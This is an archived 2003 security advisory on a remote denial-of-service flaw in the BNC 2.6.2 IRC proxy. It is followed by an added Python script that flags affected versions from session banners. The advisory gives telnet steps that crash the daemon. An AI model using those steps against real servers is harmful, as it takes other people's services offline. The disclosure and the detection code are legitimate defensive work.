bncDoS.txt

28 May 2003 | Reported by Angelo Rosiello | Type: packetstorm | Source: packetstormsecurity.com

Denial of Service vulnerability in BNC version 2.6.2 as identified by Rosiello Security.

Code
` vulnerabilities  
  
------------------------------------------------------------------------  
  
2003-05-26  
  
BNC <= 2.6.2 DoS  
  
Rosiello Security & DTORS Security  
  
ADVISORY  
  
http://www.rosiello.org  
  
Denial of Service in bnc 2.6.2  
February, 2003  
  
I. BACKGROUND  
BNC, which is an acronym for BouNCe, is a daemon designed to allow some people who  
do not have access to the net in general, but who do have access to another  
pc that can reach the net, the ability to BouNCe through this pc to IRC.  
BNC also serves as a host to allow users to bounce through shells to IRC,  
thus allowing for many features such as an interesting internet address  
commonly used for show, or for benefits such as mild protection from commonly  
used attacks such as DoS by covering a user's real IP with the IP of a  
machine more capable of handling these attacks.  
  
II. DESCRIPTION  
It is possible for a user of the program to kill the daemon remotely, but  
not to execute arbitrary code.  
  
III. ANALYSIS  
Exploitation can cause the program to exit() as follows.  
Open two telnet sessions.  
  
FIRST SESSION:  
[[email protected]]$ telnet 127.0.0.1 32986  
Trying 127.0.0.1...  
Connected to 127.0.0.1.  
Escape character is '^]'.  
user first first first first  
nick boom ~  
NOTICE AUTH :You need to say /quote PASS  
PASS temp123  
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy  
NOTICE AUTH :Level two, lets connect to something real now  
NOTICE AUTH :type /quote conn [server] to connect  
NOTICE AUTH :type /quote help for basic list of commands and usage  
  
SECOND SESSION:  
[[email protected]]$ telnet 127.0.0.1 32986  
Trying 127.0.0.1...  
Connected to 127.0.0.1.  
Escape character is '^]'.  
user second second second second  
nick boom  
NOTICE AUTH :You need to say /quote PASS  
PASS temp123  
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy  
NOTICE AUTH :Level two, lets connect to something real now  
NOTICE AUTH :type /quote conn [server] to connect  
NOTICE AUTH :type /quote help for basic list of commands and usage  
quit  
Connection closed by foreign host.  
  
NOW close the first session too...  
quit..  
(gdb)Program exited with code 010.  
The password must be the right one! (the user must be real).  
The daemon will die.  
  
IV. DETECTION  
bnc2.6.2 is vulnerable, latest versions are not.  
The maintainer of the project was advised, and he confirmed that the bug was  
fixed in the latest versions.  
  
VIII. CREDIT  
Angelo Rosiello  
http://www.rosiello.org  
http://www.dtors.net  
  
`
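
A defender-side check for section IV, as an added example that is not part of the original advisory: it scans captured session text for the BNC welcome banner shown in the transcript and flags versions at or below 2.6.2. The function names and the sample lines other than the v2.6.2 banner are assumptions made for illustration.

```python
import re

# Banner format taken from the session transcript in the advisory:
#   NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy
BANNER_RE = re.compile(r"NOTICE AUTH :Welcome to BNC v(\d+(?:\.\d+)*)")
LAST_AFFECTED = (2, 6, 2)  # advisory title: "BNC <= 2.6.2 DoS"


def parse_version(text):
    """Turn '2.6.2' into (2, 6, 2), padded to three components."""
    parts = [int(p) for p in text.split(".")]
    parts += [0] * (3 - len(parts))
    return tuple(parts)


def audit_transcript(transcript):
    """Return (line_no, version, affected) for every BNC banner found."""
    findings = []
    for line_no, line in enumerate(transcript.splitlines(), start=1):
        match = BANNER_RE.search(line)
        if match:
            version = match.group(1)
            # Compare numerically: as strings, "2.6.10" would sort below "2.6.2".
            affected = parse_version(version) <= LAST_AFFECTED
            findings.append((line_no, version, affected))
    return findings


# Constructed sample: the v2.6.2 banner is copied from the advisory; the other
# version numbers are made up only to exercise the comparison.
SAMPLE = """\
NOTICE AUTH :You need to say /quote PASS
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy
NOTICE AUTH :Welcome to BNC v2.6.10, the irc proxy
NOTICE AUTH :Welcome to BNC v2.4, the irc proxy
"""

if __name__ == "__main__":
    for line_no, version, affected in audit_transcript(SAMPLE):
        status = "AFFECTED (upgrade)" if affected else "not affected per advisory"
        print(f"line {line_no}: BNC v{version}: {status}")
```

The banner is only sent after a successful PASS, so this is meant for session captures or logs from daemons you operate.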
